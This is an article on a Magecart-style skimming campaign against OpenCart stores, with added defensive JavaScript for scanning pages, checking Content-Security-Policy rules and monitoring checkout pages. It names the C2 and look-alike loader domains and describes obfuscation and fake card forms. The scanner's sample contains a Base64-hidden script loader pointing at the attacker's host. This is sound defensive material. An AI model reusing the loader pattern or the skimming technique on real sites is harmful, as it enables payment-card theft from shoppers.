Understanding the Magecart-Style Attack on OpenCart Websites
A new wave of cyber threats has emerged, targeting e-commerce websites that use the OpenCart content management system (CMS). This attack follows a pattern similar to the well-known Magecart attacks, where malicious code is injected into online stores to steal sensitive customer data. The latest incident involves the injection of malware that mimics trusted tracking scripts, making it particularly difficult to detect.
The attackers have been stealthily embedding malicious JavaScript into landing pages, hiding their payload within legitimate analytics and marketing tags such as Facebook Pixel, Meta Pixel, and Google Tag Manager. This method allows the malware to blend in with normal website activity, reducing the chances of detection by standard security measures.
Obfuscation Techniques and Script Injection
One of the key features of this campaign is its use of obfuscation to evade detection. The malicious code stores its payload URLs as Base64 and loads them from suspicious look-alike domains, for example the loader at /tagscart.shop/cdn/analytics.min.js. At first glance these scripts look like standard Google Analytics or Tag Manager snippets; only closer inspection reveals what they actually do.
Once decoded and executed, the script dynamically creates a new element and inserts it before the existing scripts on the page. This loads the next stage, which executes heavily obfuscated JavaScript. Techniques such as hexadecimal references, array recombination, and eval() are used to decode the code at runtime, which further complicates detection.
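The following is an added example, not code from the article or from any product it mentions: a small Node.js scan that a store operator could run over the served HTML of a checkout page to catch look-alike tag snippets of the kind described above. It decodes quoted Base64 literals, resolves every URL a script references (including protocol-relative ones), compares the hosts against an allowlist of the tag vendors the store really uses, and flags eval() and hex-style obfuscation. The allowlist, the page origin store.example, the heuristics and the sample HTML are assumptions; the loader URL inside the sample is the one quoted in the article.

```javascript
// Added example (not from the article): a server-side/CI scan of a page's HTML
// for script tags that imitate analytics or tag-manager snippets. The
// allowlist, sample HTML and heuristics are assumptions for illustration.
const ALLOWED_SCRIPT_HOSTS = new Set([
  'www.googletagmanager.com',
  'www.google-analytics.com',
  'connect.facebook.net',
]);

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;
const QUOTED_B64_RE = /["']([A-Za-z0-9+/]{16,}={0,2})["']/g;
const URL_RE = /(?:https?:)?\/\/[^\s"'<>()]+/g;

// Return printable strings hidden in Base64 literals inside a script body.
function decodeBase64Strings(code) {
  const decoded = [];
  for (const m of code.matchAll(QUOTED_B64_RE)) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(text)) decoded.push(text);
  }
  return decoded;
}

// Resolve protocol-relative and relative URLs the way a browser would
// (page origin is an assumed placeholder).
function hostOf(url, pageOrigin = 'https://store.example') {
  try { return new URL(url, pageOrigin).hostname; } catch (_) { return null; }
}

// Scan every <script> in the HTML and return the ones that look suspicious.
function scanHtml(html) {
  const findings = [];
  let index = 0;
  for (const m of html.matchAll(SCRIPT_RE)) {
    index += 1;
    const [, attrs, body] = m;
    const reasons = [];
    const urls = [];
    const src = attrs.match(SRC_ATTR_RE);
    if (src) urls.push(src[1]);
    urls.push(...(body.match(URL_RE) || []));
    for (const text of decodeBase64Strings(body)) {
      reasons.push(`Base64 literal decodes to "${text}"`);
      urls.push(...(text.match(URL_RE) || []));
    }
    for (const url of urls) {
      const host = hostOf(url);
      if (host && !ALLOWED_SCRIPT_HOSTS.has(host)) reasons.push(`references non-allowlisted host ${host}`);
    }
    if (/\beval\s*\(/.test(body)) reasons.push('calls eval()');
    if (/\\x[0-9a-f]{2}/i.test(body) || /\b_0x[0-9a-f]{2,}\b/i.test(body)) {
      reasons.push('uses hex-escaped strings or hex-named identifiers');
    }
    if (reasons.length) findings.push({ script: index, reasons });
  }
  return findings;
}

// Constructed sample: a genuine-looking GTM loader followed by a look-alike
// that hides the loader URL quoted in the article behind Base64 and atob().
const FAKE_LOADER_URL = '//tagscart.shop/cdn/analytics.min.js';
const SAMPLE_HTML = `
<script>(function(w,d,s,l,i){var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script>var _0x4a2b=['${Buffer.from(FAKE_LOADER_URL).toString('base64')}'];
var s=document.createElement('script');s.src=atob(_0x4a2b[0]);
var f=document.getElementsByTagName('script')[0];f.parentNode.insertBefore(s,f);</script>`;

console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
```

Run against the sample, only the second script is reported, with three reasons: the decoded Base64 literal, the non-allowlisted host tagscart.shop, and the hex-named identifier. A real deployment would fetch the rendered checkout page on a schedule and alert on any new finding, since the genuine tag snippets change rarely.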
Fake Payment Forms and Credential Theft
The primary objective of this malware is to inject a fake credit card form during the checkout process. The form is designed to look identical to the legitimate one, capturing critical information such as the credit card number, expiration date, and CVC. Listeners are attached to events like blur, keydown, and paste, ensuring that user input is captured at every stage of the transaction.
Importantly, the attack does not rely on clipboard scraping, meaning it only captures card details that users enter manually into the fake form. After submission, the stolen data is immediately sent via POST requests to two command-and-control (C2) domains: //ultracart[.]shop/g.php and //hxjet.pics/g.php.
In a more insidious move, the original payment form is hidden once the card information is submitted. A second page then prompts users to enter further bank transaction details, increasing the risk of additional data theft.
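The skimmer needs two network actions the store never asked for: loading its own script and POSTing card data to the C2 hosts named above. A Content-Security-Policy that names the store's real tag vendors denies both. The code below is an added example (not from the article or any vendor) that parses a CSP header with a simplified version of the source-matching rules and reports whether a given policy would have blocked the script load and the exfiltration. The store origin store.example, the two policies and the vendor list are assumptions; the loader and C2 URLs are the ones quoted in the article, with the defanged "[.]" restored for parsing.

```javascript
// Added example (not from the article): does a Content-Security-Policy block
// the skimmer's script load and its POSTs to the C2 hosts? Policies, the store
// origin and the vendor list are assumed; URLs are the ones the article quotes.
const PAGE_ORIGIN = 'https://store.example';
const SKIMMER_SCRIPT = '//tagscart.shop/cdn/analytics.min.js';
const C2_ENDPOINTS = ['//ultracart[.]shop/g.php', '//hxjet.pics/g.php'].map(u => u.replace('[.]', '.'));

// Directives that fall back to default-src when absent; form-action does not.
const FALLS_BACK_TO_DEFAULT = new Set(['script-src', 'connect-src', 'img-src']);

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Simplified CSP source matching: 'self', 'none', '*', scheme sources such as
// https:, and host sources with optional scheme, *. wildcard and path prefix.
// Ports, nonces and hashes are ignored; enough for host allowlisting.
function sourceMatches(expr, url) {
  const e = expr.replace(/^'|'$/g, '').toLowerCase();
  if (e === 'none') return false;
  if (e === '*') return true;
  if (e === 'self') return url.origin === PAGE_ORIGIN;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return url.protocol === e;
  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?((?:\*\.)?[^/:*'\s]+)(\/[^?#]*)?$/);
  if (!m) return false;
  const [, scheme, host, path] = m;
  if (scheme && url.protocol !== scheme + ':') return false;
  const hostOk = host.startsWith('*.') ? url.hostname.endsWith(host.slice(1)) : url.hostname === host;
  if (!hostOk) return false;
  return !path || url.pathname.startsWith(path);
}

function isAllowed(policy, directive, urlString) {
  const url = new URL(urlString, PAGE_ORIGIN);
  let sources = policy[directive];
  if (!sources && FALLS_BACK_TO_DEFAULT.has(directive)) sources = policy['default-src'];
  if (!sources) return true;                       // nothing restricts this request
  return sources.some(src => sourceMatches(src, url));
}

// Card data can leave over fetch/XHR/sendBeacon (connect-src), a form
// submission (form-action) or an image beacon (img-src); all three must be closed.
const EXFIL_DIRECTIVES = ['connect-src', 'form-action', 'img-src'];

function evaluatePolicy(header) {
  const policy = parseCsp(header);
  return {
    skimmerScriptBlocked: !isAllowed(policy, 'script-src', SKIMMER_SCRIPT),
    exfilBlocked: C2_ENDPOINTS.every(u => EXFIL_DIRECTIVES.every(d => !isAllowed(policy, d, u))),
  };
}

// A permissive policy many stores ship: any https host may serve scripts or receive data.
const WEAK_CSP = "default-src 'self' https: 'unsafe-inline' 'unsafe-eval'";
// A tightened policy naming only the tag vendors the store uses (assumed list).
const HARDENED_CSP = [
  "default-src 'self'",
  "script-src 'self' https://www.googletagmanager.com https://connect.facebook.net",
  "connect-src 'self' https://www.google-analytics.com",
  "img-src 'self' https://www.google-analytics.com https://www.facebook.com",
  "form-action 'self'",
].join('; ');

console.log('weak:', evaluatePolicy(WEAK_CSP));
console.log('hardened:', evaluatePolicy(HARDENED_CSP));
```

The weak policy blocks nothing, because the bare scheme source https: admits tagscart.shop and both C2 hosts, and the missing form-action leaves form submissions unrestricted. The hardened policy blocks the loader and all three exfiltration paths while still letting the genuine Tag Manager script load. Inline snippets of the kind the article describes additionally need a nonce or hash, which this simplified matcher does not model.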
Delayed Data Usage and Increased Risk
What sets this attack apart is the unusually long delay in using the stolen card data. Instead of being exploited within a few days, the data remained dormant for several months. One card was used on June 18 in a pay-by-phone transaction from the US, while another was charged €47.80 to an unidentified vendor.
This delay highlights the evolving tactics of cybercriminals, who are becoming more patient and strategic in their operations. It also underscores the growing risks associated with SaaS-based e-commerce platforms, where CMS solutions like OpenCart can become prime targets for advanced malware.
The Need for Enhanced Security Measures
The breach emphasizes the importance of implementing stronger security measures beyond basic firewalls. Automated platforms such as c/side claim to detect threats by identifying obfuscated JavaScript, unauthorized form injections, and anomalous script behavior. However, as attackers continue to evolve, even small CMS deployments must remain vigilant.
Real-time monitoring and threat intelligence should no longer be optional for e-commerce vendors aiming to protect their customers' trust. Cybersecurity is an ongoing effort, and staying ahead of emerging threats requires constant adaptation and improvement of security protocols.
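As an added example of what real-time monitoring of a checkout page can look like in practice (not code from the article or from any product it names), the block below is a browser-side MutationObserver that watches for the two runtime events this campaign produces: a script element inserted from a host that is not an approved tag vendor, and card-number, expiry or CVC inputs appearing outside the store's genuine payment form. The classification is kept in a pure function so it can be tested outside a browser; the allowlist, the checkout form selector, the store origin and the sample nodes are assumptions, and the look-alike loader URL is the one quoted in the article.

```javascript
// Added example (not from the article): a browser-side monitor for scripts
// injected at runtime from non-allowlisted hosts and card fields inserted
// outside the real checkout form. Allowlist, selector and samples are assumed.
const ALLOWED_SCRIPT_HOSTS = new Set(['www.googletagmanager.com', 'www.google-analytics.com', 'connect.facebook.net']);
const CHECKOUT_FORM_SELECTOR = '#checkout-payment';   // the store's genuine payment form (assumed id)
const CARD_FIELD_RE = /(cc[-_]?(number|exp|csc|cvc)|card[-_]?(number|no|num)|cvv|cvc|expir)/i;

// node: { tagName, attrs: { name, id, autocomplete, placeholder, src, ... }, insideCheckoutForm }
function classifyAddedNode(node) {
  const tag = node.tagName.toUpperCase();
  const attrs = node.attrs || {};
  if (tag === 'SCRIPT' && attrs.src) {
    let host = null;
    try { host = new URL(attrs.src, 'https://store.example').hostname; } catch (_) {}
    if (!host || !ALLOWED_SCRIPT_HOSTS.has(host)) return { verdict: 'unexpected-script', detail: attrs.src };
    return null;
  }
  if (tag === 'INPUT') {
    const hints = [attrs.name, attrs.id, attrs.autocomplete, attrs.placeholder].filter(Boolean).join(' ');
    if (CARD_FIELD_RE.test(hints) && !node.insideCheckoutForm) {
      return { verdict: 'injected-card-field', detail: hints };
    }
  }
  return null;
}

// Flatten a live DOM element into the plain shape classifyAddedNode() expects.
function toPlainNode(el) {
  const attrs = {};
  for (const a of el.attributes) attrs[a.name.toLowerCase()] = a.value;
  return { tagName: el.tagName, attrs, insideCheckoutForm: !!el.closest(CHECKOUT_FORM_SELECTOR) };
}

// Install the observer in a browser; report() receives each finding. Returns
// null outside a browser so the rest of the file still runs under Node.
function installMonitor(report) {
  if (typeof document === 'undefined' || typeof MutationObserver === 'undefined') return null;
  const observer = new MutationObserver(records => {
    for (const r of records) {
      for (const added of r.addedNodes) {
        if (added.nodeType !== 1) continue;          // elements only
        for (const el of [added, ...added.querySelectorAll('*')]) {
          const finding = classifyAddedNode(toPlainNode(el));
          if (finding) report({ ...finding, when: new Date().toISOString() });
        }
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}

// Constructed samples mirroring the article: a loader inserted at runtime from
// the look-alike CDN, a genuine GTM loader, and a cloned card field placed
// outside the real payment form next to legitimate fields.
const SAMPLES = [
  { tagName: 'SCRIPT', attrs: { src: '//tagscart.shop/cdn/analytics.min.js' }, insideCheckoutForm: false },
  { tagName: 'SCRIPT', attrs: { src: 'https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX' }, insideCheckoutForm: false },
  { tagName: 'INPUT', attrs: { name: 'cc_number', autocomplete: 'cc-number' }, insideCheckoutForm: false },
  { tagName: 'INPUT', attrs: { name: 'cc_number', autocomplete: 'cc-number' }, insideCheckoutForm: true },
  { tagName: 'INPUT', attrs: { name: 'postcode' }, insideCheckoutForm: false },
];

function classifySamples() {
  return SAMPLES.map(n => (classifyAddedNode(n) || { verdict: 'ok' }).verdict);
}

installMonitor(f => console.log('skimmer indicator:', f));   // no-op outside a browser
console.log(classifySamples());
```

In a browser, report() is where the finding would be forwarded to the store's logging endpoint; on the samples the verdicts are unexpected-script, ok, injected-card-field, ok, ok. Because the skimmer hides the original form after capture, a complementary check is to alert when the genuine payment form loses visibility while the page is still on the checkout step.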
Conclusion
As the digital landscape continues to expand, so do the methods used by cybercriminals. The recent OpenCart attack serves as a stark reminder of the need for proactive security measures. By understanding the tactics employed in these attacks and implementing robust defenses, e-commerce businesses can better protect themselves and their customers from falling victim to similar threats.